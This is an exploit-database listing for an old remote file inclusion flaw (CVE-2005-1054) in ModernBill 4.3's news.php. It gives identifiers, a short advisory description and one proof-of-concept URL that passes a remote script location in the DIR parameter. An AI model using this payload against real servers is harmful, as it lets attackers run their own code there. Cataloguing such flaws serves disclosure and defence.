ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion
| EKU-ID: 30725 | CVE: CVE-2005-1054;OSVDB-15427;BID: 13086;GTSA-00063 | OSVDB-ID: |
| Author: GulfTech Security | Published: 2005-04-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 30725 | CVE: CVE-2005-1054;OSVDB-15427;BID: 13086;GTSA-00063 | OSVDB-ID: |
| Author: GulfTech Security | Published: 2005-04-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/13086/info ModernBill is prone to a remote file include vulnerability. The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'news.php' script. ModernBill 4.3 and prior versions are vulnerable to this issue. http://www.example.com/samples/news.php?DIR=http://www.example.com/